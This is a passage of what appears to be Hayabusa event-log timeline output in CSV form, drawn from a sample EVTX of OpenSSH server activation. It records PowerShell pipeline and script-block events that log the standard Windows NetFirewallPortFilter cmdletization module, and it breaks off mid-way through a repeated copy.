value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.403 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.404 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.434 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' -Alias '*' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.434 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' -Alias '*' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 